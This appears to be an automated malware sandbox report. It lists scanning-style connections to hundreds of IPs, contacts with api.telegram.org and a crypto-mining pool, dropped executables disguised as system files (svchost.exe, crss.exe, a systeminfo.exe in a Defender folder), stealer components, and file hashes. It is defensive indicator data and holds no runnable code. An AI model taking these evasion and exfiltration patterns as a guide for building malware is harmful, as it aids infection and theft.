BR 204.216.175.120:80 tcp
KR 122.41.78.226:80 tcp
JP 221.33.107.86:80 tcp
US 28.234.251.19:80 tcp
KR 223.54.110.191:80 tcp
NL 194.10.6.131:80 tcp
CA 167.248.175.106:80 tcp
US 24.24.61.66:80 tcp
US 64.68.3.77:80 tcp
EG 105.44.68.31:80 tcp
TH 61.19.138.219:80 tcp
US 48.32.21.92:80 tcp
JP 126.187.108.199:80 tcp
US 8.8.8.8:53 60.160.201.89.in-addr.arpa udp
US 173.87.35.166:80 tcp
ZA 41.25.29.157:80 tcp
US 165.82.9.241:80 tcp
CN 39.75.145.49:80 tcp
US 11.115.76.217:80 tcp
CN 221.200.238.7:80 tcp
CN 47.107.75.144:80 tcp
US 8.41.113.203:80 tcp
RU 78.36.169.90:80 tcp
US 173.130.104.28:80 tcp
US 70.245.53.254:80 tcp
SE 178.30.124.30:80 tcp
US 22.92.102.235:80 tcp
US 206.157.114.150:80 tcp
US 98.163.157.45:80 tcp
US 15.191.124.127:80 tcp
US 148.137.41.159:80 tcp
US 51.81.59.204:80 tcp
US 207.237.179.79:80 tcp
GB 81.159.34.83:80 tcp
IN 112.79.190.225:80 tcp
US 207.251.219.16:80 tcp
US 51.81.59.204:80 51.81.59.204 tcp
CN 112.101.252.206:80 tcp
DE 109.75.26.199:80 tcp
US 66.176.179.9:80 tcp
MA 41.251.63.247:80 tcp
US 51.81.59.204:443 tcp
ES 87.125.140.43:80 tcp
BR 179.85.166.193:80 tcp
NZ 111.69.57.123:80 tcp
GB 64.209.105.22:80 tcp
EG 45.109.80.25:80 tcp
VN 42.117.94.162:80 tcp
US 8.8.8.8:53 204.59.81.51.in-addr.arpa udp
FR 81.54.82.53:80 tcp
US 136.0.85.238:80 tcp
CN 111.174.208.201:80 tcp
US 167.120.206.197:80 tcp
IN 14.99.232.132:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
CN 112.192.243.86:80 tcp
CN 111.61.106.254:80 tcp
US 174.243.178.88:80 tcp
BH 37.131.60.98:80 tcp
KR 211.244.104.172:80 tcp
AU 157.155.93.130:80 tcp
CN 106.225.98.19:80 tcp
NL 185.52.7.177:80 tcp
JP 126.88.145.185:80 tcp
US 156.84.237.237:80 tcp
GB 25.25.184.143:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 92.131.190.111:80 tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 24.45.83.235:80 tcp
US 208.117.247.179:80 tcp
AT 193.41.201.201:80 tcp
BR 187.107.12.9:80 tcp
US 74.205.148.216:80 tcp
US 63.143.171.211:80 tcp
FR 132.227.78.8:80 tcp
US 141.106.64.228:80 tcp
AE 92.99.27.155:80 tcp
HK 202.133.12.143:80 tcp
US 70.246.236.187:80 tcp
BD 113.11.14.157:80 tcp
US 12.233.77.19:80 tcp
US 155.78.166.37:80 tcp
GB 159.65.92.163:80 tcp
GB 159.65.92.163:80 159.65.92.163 tcp
US 173.125.61.158:80 tcp
US 130.31.13.162:80 tcp
SG 43.72.7.47:80 tcp
ID 182.9.227.240:80 tcp
US 8.8.8.8:53 163.92.65.159.in-addr.arpa udp
AR 181.22.90.85:80 tcp
US 18.71.37.235:80 tcp
US 64.97.54.87:80 tcp
ES 88.1.93.113:80 tcp
US 54.111.156.99:80 tcp
US 54.121.53.1:80 tcp
JP 147.160.176.46:80 tcp
US 11.10.3.236:80 tcp
AU 58.164.9.147:80 tcp
SG 43.61.203.12:80 tcp
JP 180.55.99.249:80 tcp
US 129.111.187.51:80 tcp
US 104.64.235.52:80 tcp
ID 125.164.25.185:80 tcp
US 12.199.77.144:80 tcp
GB 213.48.64.219:80 tcp
US 172.126.252.12:80 tcp
RU 95.108.207.47:80 tcp
CN 119.166.103.193:80 tcp
US 33.109.56.201:80 tcp
KE 196.101.177.126:80 tcp
RU 89.252.89.161:80 tcp
JP 133.86.223.51:80 tcp
TN 160.156.175.120:80 tcp
US 134.16.83.114:80 tcp
IT 176.245.3.100:80 tcp
US 32.54.16.147:80 tcp
IT 94.82.173.96:80 tcp
IN 119.43.101.224:80 tcp
TH 164.115.25.14:80 tcp
JP 111.104.115.218:80 tcp
US 7.100.248.220:80 tcp
US 214.182.62.42:80 tcp
CN 106.237.208.141:80 tcp
AU 115.186.249.199:80 tcp
TH 164.115.25.14:80 164.115.25.14 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 214.101.200.174:80 tcp
DE 213.135.24.2:80 tcp
CN 124.75.34.109:80 tcp
IT 85.36.249.252:80 tcp
RU 212.73.114.122:80 tcp
PR 207.204.169.122:80 tcp
US 67.88.141.39:80 tcp
CO 181.248.164.136:80 tcp
TR 149.140.40.230:80 tcp
US 165.230.82.213:80 tcp
ZA 168.209.86.159:80 tcp
CO 190.69.4.73:80 tcp
US 100.13.35.25:80 tcp
IT 79.19.60.67:80 tcp
US 8.8.8.8:53 14.25.115.164.in-addr.arpa udp
NO 193.91.149.204:80 tcp
US 135.57.103.5:80 tcp
HK 223.18.96.124:80 tcp
GB 86.139.52.131:80 tcp
MU 196.167.21.142:80 tcp
US 208.95.112.1:80 ip-api.com tcp
NZ 118.82.215.35:80 tcp
CN 116.194.86.47:80 tcp
GB 195.152.12.88:80 tcp
US 172.126.195.94:80 tcp
US 136.216.96.115:80 tcp
JP 52.197.185.178:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 128.159.144.40:80 tcp
HU 31.46.126.134:80 tcp
CO 181.157.103.197:80 tcp
JP 202.53.208.132:80 tcp
US 138.147.216.63:80 tcp
NL 145.181.28.152:80 tcp
US 19.238.238.13:80 tcp
US 11.195.217.51:80 tcp
US 64.115.205.86:80 tcp
US 65.25.72.65:80 tcp
TH 101.109.107.45:80 tcp
IT 79.36.69.131:80 tcp
ES 212.230.115.70:80 tcp
US 131.107.35.168:80 tcp
US 136.20.92.253:80 tcp
MX 201.107.254.181:80 tcp
TW 218.174.66.128:80 tcp
CN 117.138.79.212:80 tcp
BR 191.192.41.97:80 tcp
NZ 161.29.235.158:80 tcp
CN 116.78.43.44:80 tcp
US 54.114.44.108:80 tcp
US 163.126.130.66:80 tcp
CA 138.214.193.21:80 tcp
JP 219.193.42.105:80 tcp
MA 105.159.21.76:80 tcp
US 104.81.51.141:80 tcp
DE 80.146.123.134:80 tcp
GB 178.98.39.241:80 tcp
IN 117.253.134.238:80 tcp
CA 24.70.77.116:80 tcp
US 141.238.129.91:80 tcp
KR 106.255.125.126:80 tcp
CN 112.80.27.168:80 tcp
JP 126.49.209.173:80 tcp
US 130.6.251.136:80 tcp
SE 95.204.124.20:80 tcp
US 158.2.56.195:80 tcp
US 71.150.154.102:80 tcp
DE 80.134.232.82:80 tcp
CN 106.126.171.240:80 tcp
GB 87.83.17.30:80 tcp
DE 141.32.55.254:80 tcp
AU 61.68.194.140:80 tcp
US 68.57.133.21:80 tcp
US 35.145.191.8:80 tcp
IN 13.127.194.221:80 tcp
US 131.3.187.66:80 tcp
JP 58.85.67.99:80 tcp
US 191.96.112.71:80 tcp
US 128.183.33.203:80 tcp
JP 14.193.69.44:80 tcp
GB 46.248.234.238:80 tcp
US 191.96.112.71:80 191.96.112.71 tcp
IN 13.127.194.221:80 13.127.194.221 tcp
IN 202.177.128.211:80 tcp
US 98.19.198.8:80 tcp
CN 223.1.43.168:80 tcp
IN 121.246.167.63:80 tcp
US 173.134.181.52:80 tcp
US 50.41.58.196:80 tcp
US 8.8.8.8:53 71.112.96.191.in-addr.arpa udp
US 8.8.8.8:53 221.194.127.13.in-addr.arpa udp
DE 63.190.136.205:80 tcp
US 67.243.213.178:80 tcp
KR 182.173.102.236:80 tcp
US 174.236.137.60:80 tcp
DE 87.179.57.101:80 tcp
BR 138.99.110.124:80 tcp
JP 180.6.155.170:80 tcp
US 139.233.28.134:80 tcp
KZ 2.132.91.199:80 tcp
US 216.88.255.8:80 tcp
ES 89.6.127.2:80 tcp
UZ 178.216.135.6:80 tcp
KR 223.26.160.211:80 tcp
HK 47.56.195.75:80 tcp
US 209.74.103.78:80 tcp
US 55.148.11.141:80 tcp
PH 112.207.132.19:80 tcp
US 16.254.227.93:80 tcp
AU 130.95.38.210:80 tcp
CN 219.218.81.102:80 tcp
TR 176.237.247.125:80 tcp
DE 194.64.58.61:80 tcp
US 71.129.220.81:80 tcp
NO 77.17.124.218:80 tcp
NL 23.197.158.171:80 tcp
CH 138.228.220.131:80 tcp
NL 23.197.158.171:80 23.197.158.171 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:443 pool.hashvault.pro tcp
US 63.121.123.140:80 tcp
IT 151.95.119.200:80 tcp
US 166.251.173.248:80 tcp
UA 95.134.161.176:80 tcp
DE 130.83.69.137:80 tcp
KR 59.27.215.22:80 tcp
CA 174.116.187.26:80 tcp
US 29.231.159.227:80 tcp
US 8.8.8.8:53 171.158.197.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
EG 156.190.60.184:80 tcp
HK 168.106.231.194:80 tcp
US 135.94.94.30:80 tcp
ZA 169.159.190.141:80 tcp
US 168.224.225.99:80 tcp
US 15.30.203.241:80 tcp
US 135.193.191.218:80 tcp
SA 149.232.64.71:80 tcp
KR 182.199.48.72:80 tcp
DE 188.103.193.125:80 tcp
CN 115.191.82.61:80 tcp
FR 93.18.120.100:80 tcp
SG 4.145.81.32:80 tcp
CA 138.11.61.23:80 tcp
ID 47.78.34.251:80 tcp
DE 134.104.142.117:80 tcp
US 131.187.171.252:80 tcp
US 24.58.205.183:80 tcp
US 174.210.192.196:80 tcp
SG 4.145.81.32:80 4.145.81.32 tcp
VN 171.246.131.66:80 tcp
DK 95.166.144.2:80 tcp
US 73.220.125.2:80 tcp
US 18.0.193.132:80 tcp
BY 82.209.203.46:80 tcp
US 148.26.164.223:80 tcp
CN 106.5.255.32:80 tcp
GB 25.222.69.253:80 tcp
US 128.166.216.24:80 tcp
US 9.209.42.167:80 tcp
SG 20.24.136.97:80 tcp
US 74.147.232.73:80 tcp
US 52.144.14.27:80 tcp
CN 123.15.81.202:80 tcp
US 8.8.8.8:53 32.81.145.4.in-addr.arpa udp
US 98.194.73.246:80 tcp
NL 81.205.80.239:80 tcp
IN 106.201.126.234:80 tcp
IE 185.94.46.177:80 tcp
JP 220.144.156.75:80 tcp
US 57.116.109.25:80 tcp
US 69.238.80.197:80 tcp
SK 95.103.129.67:80 tcp
DE 139.23.77.147:80 tcp
DE 213.254.32.182:80 tcp
FR 83.195.239.8:80 tcp
US 51.8.10.163:80 tcp
IL 131.125.237.110:80 tcp
US 208.34.79.91:80 tcp
CH 92.105.163.60:80 tcp
JP 107.148.99.211:80 tcp
US 22.58.33.236:80 tcp
RU 188.234.80.207:80 tcp
AU 139.132.248.76:80 tcp
JP 107.148.99.211:80 107.148.99.211 tcp
CN 59.191.12.129:80 tcp
US 104.2.124.55:80 tcp
CN 123.117.74.34:80 tcp
US 100.19.217.166:80 tcp
US 50.102.7.120:80 tcp
RU 94.139.113.13:80 tcp
US 96.209.206.42:80 tcp
US 35.25.242.104:80 tcp
NG 196.200.78.102:80 tcp
BE 109.133.146.13:80 tcp
HK 4.191.247.171:80 tcp
GB 90.222.86.145:80 tcp
MX 201.149.159.48:80 tcp
KZ 194.58.42.154:80 194.58.42.154 tcp
NL 91.141.219.174:80 tcp
GB 78.151.88.9:80 tcp
US 8.8.8.8:53 211.99.148.107.in-addr.arpa udp
HK 82.199.153.89:80 tcp
FR 82.245.81.132:80 tcp
HK 119.237.40.139:80 tcp
CN 119.164.5.73:80 tcp
US 172.44.107.39:80 tcp
US 75.192.181.242:80 tcp
CN 115.150.172.197:80 tcp
US 174.198.97.59:80 tcp
CN 119.120.3.173:80 tcp
CN 180.171.30.43:80 tcp
CZ 90.176.155.165:80 tcp
GB 149.50.13.237:80 tcp
BR 189.62.55.250:80 tcp
CN 43.137.146.159:80 tcp
US 8.8.8.8:53 154.42.58.194.in-addr.arpa udp
CN 36.0.72.221:80 tcp
DE 89.247.210.110:80 tcp
JP 133.61.132.35:80 tcp
US 45.56.90.233:80 tcp
US 17.87.91.35:80 tcp
US 26.10.188.91:80 tcp
US 98.167.40.177:80 tcp
US 165.7.81.242:80 tcp
US 198.214.210.156:80 tcp
BE 44.11.215.236:80 tcp
NL 145.41.1.128:80 tcp
US 75.213.35.177:80 tcp
CN 110.116.236.252:80 tcp
US 135.45.140.104:80 tcp
US 44.215.96.109:80 tcp
US 44.87.135.68:80 tcp
US 166.41.73.126:80 tcp
US 205.35.93.77:80 tcp
US 63.207.173.69:80 tcp
CN 101.26.68.127:80 tcp
FR 89.224.233.138:80 tcp
US 68.189.146.85:80 tcp
DE 164.20.248.241:80 tcp
US 162.201.177.114:80 tcp
BE 193.53.115.91:80 tcp
US 160.36.51.247:80 tcp
KZ 194.58.42.154:80 194.58.42.154 tcp
US 75.149.165.145:80 tcp
US 208.99.237.3:80 tcp
US 12.46.214.33:80 tcp
ES 77.229.60.253:80 tcp
US 215.101.8.12:80 tcp
KR 210.181.184.173:80 tcp
IE 34.253.125.23:80 tcp
CN 161.207.156.22:80 tcp
US 209.134.193.99:80 tcp
US 8.2.174.156:80 tcp
IT 147.123.121.162:80 tcp
BE 194.78.105.0:80 tcp
US 208.48.31.35:80 tcp
US 166.240.198.157:80 tcp
AR 170.210.105.26:80 tcp
CN 118.245.192.117:80 tcp
BR 200.17.21.5:80 tcp
GB 154.47.126.124:80 tcp
US 185.47.87.87:80 tcp
US 140.239.219.10:80 tcp
US 65.248.54.67:80 tcp
JP 150.65.194.10:80 tcp
SG 54.169.6.76:80 tcp
US 155.254.221.121:80 tcp
US 130.55.43.206:80 tcp
US 216.176.8.150:80 tcp
HK 154.82.85.140:80 tcp
ZA 41.17.152.124:80 tcp
CN 175.172.201.201:80 tcp
HK 154.82.85.140:80 154.82.85.140 tcp
US 98.68.73.18:80 tcp
US 96.19.142.53:80 tcp
US 131.23.58.130:80 tcp
US 166.168.132.5:80 tcp
US 160.253.44.182:80 tcp
EG 217.55.228.70:80 tcp
AU 114.78.173.102:80 tcp
NL 20.209.11.183:80 tcp
RO 46.97.238.41:80 tcp
US 216.72.33.229:80 tcp
JP 219.62.73.189:80 tcp
US 170.125.24.65:80 tcp
KR 118.222.247.99:80 tcp
US 69.12.157.36:80 tcp
US 8.8.8.8:53 140.85.82.154.in-addr.arpa udp
IT 95.244.134.22:80 tcp
US 214.128.136.153:80 tcp
JP 42.126.168.168:80 tcp
MA 105.145.44.237:80 tcp
GB 86.147.54.129:80 tcp
GB 149.63.11.150:80 tcp
CO 190.29.29.103:80 tcp
CN 101.18.91.141:80 tcp
VN 42.112.112.198:80 tcp
CN 110.98.165.230:80 tcp
RO 86.35.18.46:80 tcp
US 66.244.129.116:80 tcp
CN 42.203.67.188:80 tcp
JP 126.136.168.189:80 tcp
GB 81.108.108.204:80 tcp
SV 190.150.169.34:80 tcp
KR 1.11.235.148:80 tcp
VE 201.249.78.10:80 tcp
CN 42.185.222.194:80 tcp
KE 102.5.160.59:80 tcp
BR 139.82.188.222:80 tcp
CN 139.201.132.43:80 tcp
JP 158.213.27.60:80 tcp
RU 46.111.186.77:80 tcp
US 97.45.67.180:80 tcp
US 199.107.181.236:80 tcp
CA 159.206.138.98:80 tcp
CN 101.95.229.98:80 tcp
AU 101.188.242.238:80 tcp
FR 176.167.122.152:80 tcp
JP 118.153.234.68:80 tcp
HK 14.198.55.56:80 tcp
DE 185.221.105.120:80 tcp
IT 93.60.183.121:80 tcp
FR 78.229.153.212:80 tcp
RU 78.36.222.164:80 tcp
DE 185.221.105.120:80 185.221.105.120 tcp
KR 49.173.245.201:80 tcp
US 33.243.254.95:80 tcp
CN 36.47.0.174:80 tcp
US 131.77.150.48:80 tcp
CA 51.222.204.230:80 tcp
CA 132.207.166.225:80 tcp
US 32.235.101.161:80 tcp
DO 186.33.98.59:80 tcp
US 97.106.170.2:80 tcp
US 215.71.247.114:80 tcp
US 26.103.88.166:80 tcp
US 8.8.8.8:53 120.105.221.185.in-addr.arpa udp
TW 59.123.153.38:80 tcp
US 23.60.109.250:80 tcp
RO 79.113.216.226:80 tcp
ZA 196.253.219.225:80 tcp
JP 153.240.116.166:80 tcp
CA 142.44.182.32:80 tcp
US 100.215.63.200:80 tcp
US 30.112.243.152:80 tcp
US 157.219.119.247:80 tcp
BR 187.84.129.26:80 tcp
US 23.60.109.250:80 23.60.109.250 tcp
VN 14.181.40.89:80 tcp
US 143.55.70.187:80 tcp
US 198.27.50.151:80 tcp
FR 193.50.110.50:80 tcp
US 134.231.95.1:80 tcp
ID 108.137.1.91:80 tcp
US 16.2.129.7:80 tcp
GB 141.92.16.232:80 tcp
CN 36.127.119.89:80 tcp
US 144.112.37.226:80 tcp
US 8.8.8.8:53 250.109.60.23.in-addr.arpa udp
US 40.205.11.182:80 tcp
US 51.81.206.90:80 tcp
US 97.202.71.70:80 tcp
US 152.180.230.91:80 tcp
US 12.152.70.201:80 tcp
FR 90.46.75.155:80 tcp
US 11.222.53.43:80 tcp
US 29.110.232.147:80 tcp
IN 13.233.231.155:80 tcp
US 51.81.206.90:80 51.81.206.90 tcp
US 35.87.112.74:80 tcp
MX 189.190.236.46:80 tcp
US 13.225.31.169:80 tcp
CO 190.130.110.7:80 tcp
US 8.8.8.8:53 wisehosting.com udp
SG 135.149.244.35:80 tcp
US 9.91.101.98:80 tcp
US 172.67.216.80:443 wisehosting.com tcp
RU 95.110.23.209:80 tcp
US 173.90.84.15:80 tcp
NZ 124.197.2.126:80 tcp
JP 150.76.125.210:80 tcp
US 8.8.8.8:53 90.206.81.51.in-addr.arpa udp
IE 92.60.193.72:80 tcp

Files

C:\ProgramData\Microsoft\hacn.exe

C:\ProgramData\Microsoft\based.exe

C:\Users\Admin\AppData\Local\Temp\_MEI28802\python311.dll

C:\Users\Admin\AppData\Local\Temp\_MEI28802\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\python310.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI28802\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI28802\blank.aes

C:\Users\Admin\AppData\Local\Temp\_MEI28802\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rarreg.key

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI28802\base_library.zip

MD5 f3bdb92e5c64ec84c2fc7169a72aa1ed
SHA1 45b1aadc7b3ef8bda3d6dda334844571c5e8f3fa
SHA256 a2931aa7f395ad28701de71f582032f2ff1fd1166277f22749627889496b4861
SHA512 e96f10e532e138f6598a9cc1ca2e1b779c9d02395c1ab5996fc38c8dd0b71456a40d8590ce427d4bbdd1812c7b730d2de7f4df186509e461550ccf26e0b7f3db

C:\Users\Admin\AppData\Local\Temp\_MEI44802\select.pyd

MD5 a653f35d05d2f6debc5d34daddd3dfa1
SHA1 1a2ceec28ea44388f412420425665c3781af2435
SHA256 db85f2f94d4994283e1055057372594538ae11020389d966e45607413851d9e9
SHA512 5aede99c3be25b1a962261b183ae7a7fb92cb0cb866065dc9cd7bb5ff6f41cc8813d2cc9de54670a27b3ad07a33b833eaa95a5b46dad7763ca97dfa0c1ce54c9

C:\Users\Admin\AppData\Local\Temp\_MEI44802\libcrypto-1_1.dll

MD5 9d7a0c99256c50afd5b0560ba2548930
SHA1 76bd9f13597a46f5283aa35c30b53c21976d0824
SHA256 9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939
SHA512 cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2

C:\Users\Admin\AppData\Local\Temp\_MEI44802\base_library.zip

MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

memory/2428-138-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp

memory/2428-137-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp

memory/2428-148-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp

memory/2428-136-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp

memory/2428-134-0x00007FFCAE600000-0x00007FFCAE619000-memory.dmp

memory/2428-133-0x00007FFC9F0F0000-0x00007FFC9F267000-memory.dmp

C:\ProgramData\main.exe

MD5 3d3c49dd5d13a242b436e0a065cd6837
SHA1 e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256 e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512 dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

memory/2428-132-0x00007FFCA7600000-0x00007FFCA7623000-memory.dmp

memory/2428-128-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp

C:\ProgramData\crss.exe

MD5 f92152107324281ce753765611679657
SHA1 978022d968273c42ab333d9be9fbf35fbf6403b5
SHA256 3c7a298891ea92996205cd6625b17c6d6308272d21d298d08be87455ff06970b
SHA512 43697c4649e743d3eda775d132407e979fbdf3c8239204333a233b301e467a29646abc50f20c88559a6c13b95ce9692134425acc5a8afa6afcd5134ce46852ab

memory/2428-172-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp

C:\ProgramData\svchost.exe

MD5 45c59202dce8ed255b4dbd8ba74c630f
SHA1 60872781ed51d9bc22a36943da5f7be42c304130
SHA256 d07c47f759245d34a5b94786637c3d2424c7e3f3dea3d738d95bf4721dbf3b16
SHA512 fff5b16ae38681ed56782c0f0423560dab45065685d7272424206f43c80486318180aa22d66bd197c8c530e4c24dbaaaa020beb76b619dc767ee59faa27e23ed

C:\ProgramData\setup.exe

MD5 1274cbcd6329098f79a3be6d76ab8b97
SHA1 53c870d62dcd6154052445dc03888cdc6cffd370
SHA256 bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278
SHA512 a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

memory/2868-298-0x0000024969720000-0x0000024969796000-memory.dmp

memory/2356-299-0x0000019C7BA00000-0x0000019C7BA22000-memory.dmp

memory/2428-284-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4pv5e4f.fll.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2428-310-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp

memory/2428-325-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp

memory/2428-312-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp

memory/2428-283-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

MD5 65ccd6ecb99899083d43f7c24eb8f869
SHA1 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256 aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

memory/2868-167-0x0000024966D00000-0x00000249672A0000-memory.dmp

memory/2428-127-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp

memory/2428-364-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp

memory/5248-379-0x00007FF757490000-0x00007FF7579F5000-memory.dmp

memory/2868-389-0x0000024968E80000-0x0000024968E9E000-memory.dmp

memory/5728-408-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-416-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-414-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-412-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-410-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-402-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-400-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-399-0x000001EF7FFE0000-0x000001EF7FFE1000-memory.dmp

memory/5728-406-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-404-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/2856-1692-0x00000000005A0000-0x0000000000932000-memory.dmp

memory/5808-1698-0x00000137799B0000-0x00000137799B8000-memory.dmp

memory/2856-1709-0x000000001C220000-0x000000001C246000-memory.dmp

memory/2856-1715-0x0000000001020000-0x000000000102E000-memory.dmp

memory/2856-1717-0x000000001B670000-0x000000001B68C000-memory.dmp

memory/2856-1722-0x000000001C2A0000-0x000000001C2F0000-memory.dmp

memory/2856-1724-0x0000000001040000-0x0000000001050000-memory.dmp

memory/2856-1729-0x000000001C250000-0x000000001C268000-memory.dmp

memory/2856-1731-0x000000001B650000-0x000000001B660000-memory.dmp

memory/2856-1751-0x000000001B660000-0x000000001B670000-memory.dmp

memory/2856-1753-0x000000001C270000-0x000000001C27E000-memory.dmp

C:\ProgramData\шева.txt

MD5 17bcf11dc5f1fa6c48a1a856a72f1119
SHA1 873ec0cbd312762df3510b8cccf260dc0a23d709
SHA256 a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9
SHA512 9c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25

memory/2856-1758-0x000000001C280000-0x000000001C28E000-memory.dmp

memory/2856-1760-0x000000001C310000-0x000000001C322000-memory.dmp

memory/2856-1762-0x000000001C290000-0x000000001C2A0000-memory.dmp

memory/2856-1764-0x000000001C330000-0x000000001C346000-memory.dmp

memory/2856-1766-0x000000001C350000-0x000000001C362000-memory.dmp

memory/2856-2079-0x000000001C8A0000-0x000000001CDC8000-memory.dmp

memory/2856-2099-0x000000001C2F0000-0x000000001C2FE000-memory.dmp

memory/2856-2123-0x000000001C300000-0x000000001C310000-memory.dmp

memory/2856-2133-0x000000001C3A0000-0x000000001C3B0000-memory.dmp

memory/2856-2143-0x000000001C410000-0x000000001C46A000-memory.dmp

memory/2856-2157-0x000000001C3B0000-0x000000001C3BE000-memory.dmp

memory/2856-2162-0x000000001C3C0000-0x000000001C3D0000-memory.dmp

memory/2856-2175-0x000000001C3D0000-0x000000001C3DE000-memory.dmp

memory/2856-2183-0x000000001C470000-0x000000001C488000-memory.dmp

memory/2856-2186-0x000000001C620000-0x000000001C66E000-memory.dmp

C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe

MD5 5fe249bbcc644c6f155d86e8b3cc1e12
SHA1 f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d
SHA256 9308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80
SHA512 b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39

memory/6504-2352-0x000002AB8C550000-0x000002AB8CAF0000-memory.dmp

memory/6504-2629-0x000002ABA7E70000-0x000002ABA7E7A000-memory.dmp

